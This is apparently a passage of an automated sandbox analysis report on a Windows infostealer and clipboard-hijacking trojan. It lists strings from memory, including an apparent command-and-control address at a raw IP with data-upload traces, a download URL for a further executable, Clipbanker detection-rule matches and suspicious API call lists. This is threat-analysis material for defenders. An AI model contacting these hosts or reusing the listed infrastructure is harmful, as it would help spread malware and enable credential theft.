                    Source: Pct.pif, 0000000B.00000002.3806737898.0000000001B2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.145.4.234/bc17a177456805bc/sqlite3.dll
                    Source: Pct.pif, 0000000B.00000002.3806610592.0000000001A3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.145.4.234/bc17a177456805bc/vcruntime140.dll
                    Source: Pct.pif, 0000000B.00000002.3806737898.0000000001B4A000.00000004.00000800.00020000.00000000.sdmp, Pct.pif, 0000000B.00000002.3806737898.0000000001B2C000.00000004.00000800.00020000.00000000.sdmp, Pct.pif, 0000000B.00000002.3806737898.0000000001BD1000.00000004.00000800.00020000.00000000.sdmp, Pct.pif, 0000000B.00000002.3807123175.0000000001CF0000.00000004.00000800.00020000.00000000.sdmp, Pct.pif, 0000000B.00000002.3804413256.00000000003AB000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://45.145.4.234/ce4b71a59f4ee761.php
                    Source: Pct.pif, 0000000B.00000002.3807123175.0000000001CF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.145.4.234/ce4b71a59f4ee761.phpDrive
                    Source: Pct.pif, 0000000B.00000002.3807123175.0000000001CF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.145.4.234/ce4b71a59f4ee761.phpRCHt
                    Source: Pct.pif, 0000000B.00000002.3807123175.0000000001CF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.145.4.234/ce4b71a59f4ee761.phpWS
                    Source: Pct.pif, 0000000B.00000002.3807123175.0000000001CF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.145.4.234/ce4b71a59f4ee761.phpest
                    Source: Pct.pif, 0000000B.00000002.3804413256.00000000003AB000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://45.145.4.234/ce4b71a59f4ee761.phpry=----BGDHDAFIDGDBGCAAFIDHefault-release
                    Source: Pct.pif, 0000000B.00000002.3806641933.0000000001A6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.145.4.234/g
                    Source: Pct.pif, 0000000B.00000002.3804413256.00000000003AB000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://45.145.4.234art/form-data;
                    Source: Pct.pif, 0000000B.00000002.3806641933.0000000001A6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.145.4.234t
                    Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                    Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                    Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                    Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                    Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                    Source: file.exe, 00000000.00000003.2198637480.00000000028FC000.00000004.00000020.00020000.00000000.sdmp, Cake.0.dr, Pct.pif.2.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
                    Source: file.exe, 00000000.00000003.2198637480.00000000028FC000.00000004.00000020.00020000.00000000.sdmp, Cake.0.dr, Pct.pif.2.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                    Source: file.exe, 00000000.00000003.2198637480.00000000028FC000.00000004.00000020.00020000.00000000.sdmp, Cake.0.dr, Pct.pif.2.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                    Source: file.exe, 00000000.00000003.2198637480.00000000028FC000.00000004.00000020.00020000.00000000.sdmp, Cake.0.dr, Pct.pif.2.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
                    Source: KFCFBFHIEB.exe, 00000016.00000003.3805594127.000000000287E000.00000004.00000020.00020000.00000000.sdmp, l3[1].exe.11.dr, oobeldr.exe.22.dr, KFCFBFHIEB.exe.11.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                    Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                    Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                    Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                    Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                    Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                    Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                    Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                    Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                    Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                    Source: KFCFBFHIEB.exe, 00000016.00000003.3805594127.000000000287E000.00000004.00000020.00020000.00000000.sdmp, l3[1].exe.11.dr, oobeldr.exe.22.dr, KFCFBFHIEB.exe.11.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                    Source: Pct.pif, 0000000B.00000002.3807123175.0000000001CF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.usO
                    Source: file.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                    Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.drString found in binary or memory: http://ocsp.digicert.com0
                    Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.drString found in binary or memory: http://ocsp.digicert.com0A
                    Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.drString found in binary or memory: http://ocsp.digicert.com0C
                    Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.drString found in binary or memory: http://ocsp.digicert.com0N
                    Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.drString found in binary or memory: http://ocsp.digicert.com0X
                    Source: KFCFBFHIEB.exe, 00000016.00000003.3805594127.000000000287E000.00000004.00000020.00020000.00000000.sdmp, l3[1].exe.11.dr, oobeldr.exe.22.dr, KFCFBFHIEB.exe.11.drString found in binary or memory: http://ocsp.sectigo.com0
                    Source: Pct.pif, 0000000B.00000002.3807123175.0000000001CF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.usertrusD
                    Source: file.exe, 00000000.00000003.2198637480.00000000028FC000.00000004.00000020.00020000.00000000.sdmp, Cake.0.dr, Pct.pif.2.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                    Source: file.exe, 00000000.00000003.2198637480.00000000028FC000.00000004.00000020.00020000.00000000.sdmp, Cake.0.dr, Pct.pif.2.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
                    Source: file.exe, 00000000.00000003.2198637480.00000000028FC000.00000004.00000020.00020000.00000000.sdmp, Cake.0.dr, Pct.pif.2.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                    Source: file.exe, 00000000.00000003.2198637480.00000000028FC000.00000004.00000020.00020000.00000000.sdmp, Cake.0.dr, Pct.pif.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                    Source: file.exe, 00000000.00000003.2198637480.00000000028FC000.00000004.00000020.00020000.00000000.sdmp, Cake.0.dr, Pct.pif.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
                    Source: file.exe, 00000000.00000003.2198637480.00000000028FC000.00000004.00000020.00020000.00000000.sdmp, Pct.pif, 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmp, Cake.0.dr, Pct.pif.2.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
                    Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.drString found in binary or memory: http://www.digicert.com/CPS0
                    Source: Pct.pif, Pct.pif, 0000000B.00000002.3830830020.000000006CC9D000.00000002.00000001.01000000.00000009.sdmp, mozglue[1].dll.11.dr, mozglue.dll.11.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                    Source: Pct.pif, 0000000B.00000002.3830611184.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, Pct.pif, 0000000B.00000002.3819529518.000000001D87B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                    Source: Pct.pif, 0000000B.00000002.3806737898.0000000001B5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecop
                    Source: Pct.pif, 0000000B.00000002.3806737898.0000000001B5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecopnacl
                    Source: FIDGDAKF.11.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: Pct.pif, 0000000B.00000002.3806737898.0000000001B5B000.00000004.00000800.00020000.00000000.sdmp, KJEBKJDAFHJDGDHJKKEG.11.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
                    Source: Pct.pif, 0000000B.00000002.3806737898.0000000001B5B000.00000004.00000800.00020000.00000000.sdmp, KJEBKJDAFHJDGDHJKKEG.11.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
                    Source: FIDGDAKF.11.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: Pct.pif, 0000000B.00000002.3806737898.0000000001B5B000.00000004.00000800.00020000.00000000.sdmp, FIDGDAKF.11.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: Pct.pif, 0000000B.00000002.3806737898.0000000001B5B000.00000004.00000800.00020000.00000000.sdmp, FIDGDAKF.11.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: Pct.pif, 0000000B.00000002.3806737898.0000000001B5B000.00000004.00000800.00020000.00000000.sdmp, KJEBKJDAFHJDGDHJKKEG.11.drString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
                    Source: Pct.pif, 0000000B.00000002.3806737898.0000000001B5B000.00000004.00000800.00020000.00000000.sdmp, KJEBKJDAFHJDGDHJKKEG.11.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                    Source: Pct.pif, 0000000B.00000002.3806737898.0000000001B5B000.00000004.00000800.00020000.00000000.sdmp, FIDGDAKF.11.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: FIDGDAKF.11.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: Pct.pif, 0000000B.00000002.3806737898.0000000001B5B000.00000004.00000800.00020000.00000000.sdmp, FIDGDAKF.11.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: KJEBKJDAFHJDGDHJKKEG.11.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                    Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.drString found in binary or memory: https://mozilla.org0/
                    Source: KFCFBFHIEB.exe, 00000016.00000003.3805594127.000000000287E000.00000004.00000020.00020000.00000000.sdmp, l3[1].exe.11.dr, oobeldr.exe.22.dr, KFCFBFHIEB.exe.11.drString found in binary or memory: https://sectigo.com/CPS0
                    Source: Pct.pif, 0000000B.00000002.3806610592.0000000001A3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sst.my/
                    Source: Pct.pif, 0000000B.00000002.3806641933.0000000001A6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sst.my/folder/l3.exe
                    Source: JJDGIIDHJEBGIDHJJDBKEHCAAA.11.drString found in binary or memory: https://support.mozilla.org
                    Source: JJDGIIDHJEBGIDHJJDBKEHCAAA.11.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                    Source: JJDGIIDHJEBGIDHJJDBKEHCAAA.11.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
                    Source: Pct.pif, 0000000B.00000002.3806737898.0000000001B5B000.00000004.00000800.00020000.00000000.sdmp, KJEBKJDAFHJDGDHJKKEG.11.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
                    Source: file.exe, 00000000.00000003.2198637480.00000000028FC000.00000004.00000020.00020000.00000000.sdmp, Cake.0.dr, Pct.pif.2.drString found in binary or memory: https://www.autoitscript.com/autoit3/
                    Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.drString found in binary or memory: https://www.digicert.com/CPS0
                    Source: FIDGDAKF.11.drString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: Pct.pif.2.drString found in binary or memory: https://www.globalsign.com/repository/0
                    Source: file.exe, 00000000.00000003.2198637480.00000000028FC000.00000004.00000020.00020000.00000000.sdmp, Cake.0.dr, Pct.pif.2.drString found in binary or memory: https://www.globalsign.com/repository/06
                    Source: FIDGDAKF.11.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: JJDGIIDHJEBGIDHJJDBKEHCAAA.11.drString found in binary or memory: https://www.mozilla.org
                    Source: JJDGIIDHJEBGIDHJJDBKEHCAAA.11.drString found in binary or memory: https://www.mozilla.org#
                    Source: JJDGIIDHJEBGIDHJJDBKEHCAAA.11.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
                    Source: JJDGIIDHJEBGIDHJJDBKEHCAAA.11.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
                    Source: JJDGIIDHJEBGIDHJJDBKEHCAAA.11.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                    Source: Pct.pif, 0000000B.00000002.3806737898.0000000001B5B000.00000004.00000800.00020000.00000000.sdmp, KJEBKJDAFHJDGDHJKKEG.11.drString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
                    Source: unknownNetwork traffic detected: HTTP traffic on port 63886 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63886
                    Source: unknownHTTPS traffic detected: 103.6.198.219:443 -> 192.168.2.6:63886 version: TLS 1.2
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050CD
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00C34830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,11_2_00C34830
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00C34632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,11_2_00C34632
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00C4D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,11_2_00C4D164

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 25.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
                    Source: 25.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
                    Source: 22.2.KFCFBFHIEB.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
                    Source: 22.2.KFCFBFHIEB.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
                    Source: 00000016.00000002.3807704895.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
                    Source: 00000016.00000002.3807704895.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
                    Source: 00000019.00000002.4659046866.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
                    Source: 00000019.00000002.4659046866.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_6CC8B8C0 rand_s,NtQueryVirtualMemory,11_2_6CC8B8C0
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_6CC8B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,11_2_6CC8B910
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00C242D5: CreateFileW,DeviceIoControl,CloseHandle,11_2_00C242D5
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00C18F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,11_2_00C18F2E
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_00403883
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00C25778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,11_2_00C25778
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\KateContributorJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\DirectionsHardcoverJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\BootInvestJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\RewardsPassageJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\CompSubcommitteeJump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040497C0_2_0040497C
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406ED20_2_00406ED2
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004074BB0_2_004074BB
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00BCB02011_2_00BCB020
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00BC94E011_2_00BC94E0
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00BC9C8011_2_00BC9C80
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00BE23F511_2_00BE23F5
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00C4840011_2_00C48400
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00BF650211_2_00BF6502
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00BCE6F011_2_00BCE6F0
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00BF265E11_2_00BF265E
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00BE282A11_2_00BE282A
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00BF89BF11_2_00BF89BF
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00BF6A7411_2_00BF6A74
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00C40A3A11_2_00C40A3A
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00BD0BE011_2_00BD0BE0
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00C1EDB211_2_00C1EDB2
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00BECD5111_2_00BECD51
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00C40EB711_2_00C40EB7
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00C28E4411_2_00C28E44
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00BF6FE611_2_00BF6FE6
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00BE33B711_2_00BE33B7
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00BEF40911_2_00BEF409
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00BDD45D11_2_00BDD45D
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00BE16B411_2_00BE16B4
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00BCF6A011_2_00BCF6A0
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00BDF62811_2_00BDF628
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00BC166311_2_00BC1663
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00BE78C311_2_00BE78C3
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00BE1BA811_2_00BE1BA8
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00BEDBA511_2_00BEDBA5
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00BF9CE511_2_00BF9CE5
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00BDDD2811_2_00BDDD28
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00BEBFD611_2_00BEBFD6
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00BE1FC011_2_00BE1FC0
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_6CC235A011_2_6CC235A0
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_6CC66CF011_2_6CC66CF0
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_6CC36C8011_2_6CC36C80
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_6CC9AC0011_2_6CC9AC00
